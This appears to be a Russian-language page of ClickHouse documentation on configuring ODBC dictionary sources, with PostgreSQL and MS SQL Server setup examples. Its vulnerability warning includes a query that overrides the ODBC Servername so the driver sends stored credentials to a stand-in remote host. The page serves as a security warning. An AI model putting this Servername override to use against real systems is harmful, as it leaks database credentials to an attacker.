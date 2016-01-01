Источник словаря ODBC

Вы можете использовать этот метод для подключения любой базы данных, для которой существует ODBC‑драйвер.
Пример настроек:
SOURCE(ODBC(
db 'DatabaseName'
table 'SchemaName.TableName'
connection_string 'DSN=some_parameters'
invalidate_query 'SQL_QUERY'
query 'SELECT id, value_1, value_2 FROM db_name.table_name'
))
<source>
<odbc>
<db>DatabaseName</db>
<table>ShemaName.TableName</table>
<connection_string>DSN=some_parameters</connection_string>
<invalidate_query>SQL_QUERY</invalidate_query>
<query>SELECT id, value_1, value_2 FROM ShemaName.TableName</query>
</odbc>
</source>
Поля настроек:
|Setting
|Description
db
|Имя базы данных. Опустите это поле, если имя базы данных задано в параметрах
<connection_string>.
table
|Имя таблицы и схемы, если указана.
connection_string
|Строка подключения.
invalidate_query
|Запрос для проверки статуса словаря. Необязательный параметр. Подробнее см. раздел Refreshing dictionary data using LIFETIME.
background_reconnect
|Фоновое переподключение к реплике при сбое соединения. Необязательный параметр.
query
|Произвольный запрос. Необязательный параметр.
Примечание
Поля
table и
query не могут использоваться одновременно. При этом одно из полей
table или
query должно быть объявлено.
ClickHouse получает символы кавычек от ODBC‑драйвера и заключает все настройки в кавычки в запросах к драйверу, поэтому необходимо указывать имя таблицы с учетом регистра, используемого в базе данных.
Если у вас возникают проблемы с кодировками при использовании Oracle, см. соответствующий пункт FAQ.
Известная уязвимость функциональности словаря ODBC
Примечание
При подключении к базе данных через драйвер ODBC параметр соединения
Servername может быть подменён. В этом случае значения
USERNAME и
PASSWORD из
odbc.ini отправляются на удалённый сервер и могут быть скомпрометированы.
Пример небезопасного использования
Настроим unixODBC для PostgreSQL. Содержимое
/etc/odbc.ini:
[gregtest]
Driver = /usr/lib/psqlodbca.so
Servername = localhost
PORT = 5432
DATABASE = test_db
#OPTION = 3
USERNAME = test
PASSWORD = test
Если затем вы выполните, например, такой запрос
SELECT * FROM odbc('DSN=gregtest;Servername=some-server.com', 'test_db');
ODBC-драйвер будет отправлять значения
USERNAME и
PASSWORD из
odbc.ini на
some-server.com.
Пример подключения к PostgreSQL
Ubuntu.
Установка unixODBC и драйвера ODBC для PostgreSQL:
$ sudo apt-get install -y unixodbc odbcinst odbc-postgresql
Настройка
/etc/odbc.ini (или
~/.odbc.ini, если вы вошли в систему под пользователем, от имени которого запускается ClickHouse):
[DEFAULT]
Driver = myconnection
[myconnection]
Description = PostgreSQL connection to my_db
Driver = PostgreSQL Unicode
Database = my_db
Servername = 127.0.0.1
UserName = username
Password = password
Port = 5432
Protocol = 9.3
ReadOnly = No
RowVersioning = No
ShowSystemTables = No
ConnSettings =
Конфигурация словаря в ClickHouse:
CREATE DICTIONARY table_name (
id UInt64,
some_column UInt64 DEFAULT 0
)
PRIMARY KEY id
SOURCE(ODBC(connection_string 'DSN=myconnection' table 'postgresql_table'))
LAYOUT(HASHED())
LIFETIME(MIN 300 MAX 360)
<clickhouse>
<dictionary>
<name>table_name</name>
<source>
<odbc>
<!-- В параметре connection_string вы можете указать следующие параметры: -->
<!-- DSN=myconnection;UID=username;PWD=password;HOST=127.0.0.1;PORT=5432;DATABASE=my_db -->
<connection_string>DSN=myconnection</connection_string>
<table>postgresql_table</table>
</odbc>
</source>
<lifetime>
<min>300</min>
<max>360</max>
</lifetime>
<layout>
<hashed/>
</layout>
<structure>
<id>
<name>id</name>
</id>
<attribute>
<name>some_column</name>
<type>UInt64</type>
<null_value>0</null_value>
</attribute>
</structure>
</dictionary>
</clickhouse>
Вам может потребоваться отредактировать
odbc.ini, чтобы указать полный путь к библиотеке драйвера
DRIVER=/usr/local/lib/psqlodbcw.so.
Пример подключения MS SQL Server
ОС Ubuntu.
Установка ODBC-драйвера для подключения к MS SQL Server:
$ sudo apt-get install tdsodbc freetds-bin sqsh
Настройка драйвера:
$ cat /etc/freetds/freetds.conf
...
[MSSQL]
host = 192.168.56.101
port = 1433
tds version = 7.0
client charset = UTF-8
# test TDS connection
$ sqsh -S MSSQL -D database -U user -P password
$ cat /etc/odbcinst.ini
[FreeTDS]
Description = FreeTDS
Driver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so
Setup = /usr/lib/x86_64-linux-gnu/odbc/libtdsS.so
FileUsage = 1
UsageCount = 5
$ cat /etc/odbc.ini
# $ cat ~/.odbc.ini # if you signed in under a user that runs ClickHouse
[MSSQL]
Description = FreeTDS
Driver = FreeTDS
Servername = MSSQL
Database = test
UID = test
PWD = test
Port = 1433
# (optional) test ODBC connection (to use isql-tool install the [unixodbc](https://packages.debian.org/sid/unixodbc)-package)
$ isql -v MSSQL "user" "password"
Примечания:
- чтобы определить самую раннюю версию TDS, поддерживаемую конкретной версией SQL Server, обратитесь к документации по продукту или см. MS-TDS Product Behavior
Настройка словаря в ClickHouse:
CREATE DICTIONARY test (
k UInt64,
s String DEFAULT ''
)
PRIMARY KEY k
SOURCE(ODBC(table 'dict' connection_string 'DSN=MSSQL;UID=test;PWD=test'))
LAYOUT(FLAT())
LIFETIME(MIN 300 MAX 360)
<clickhouse>
<dictionary>
<name>test</name>
<source>
<odbc>
<table>dict</table>
<connection_string>DSN=MSSQL;UID=test;PWD=test</connection_string>
</odbc>
</source>
<lifetime>
<min>300</min>
<max>360</max>
</lifetime>
<layout>
<flat />
</layout>
<structure>
<id>
<name>k</name>
</id>
<attribute>
<name>s</name>
<type>String</type>
<null_value></null_value>
</attribute>
</structure>
</dictionary>
</clickhouse>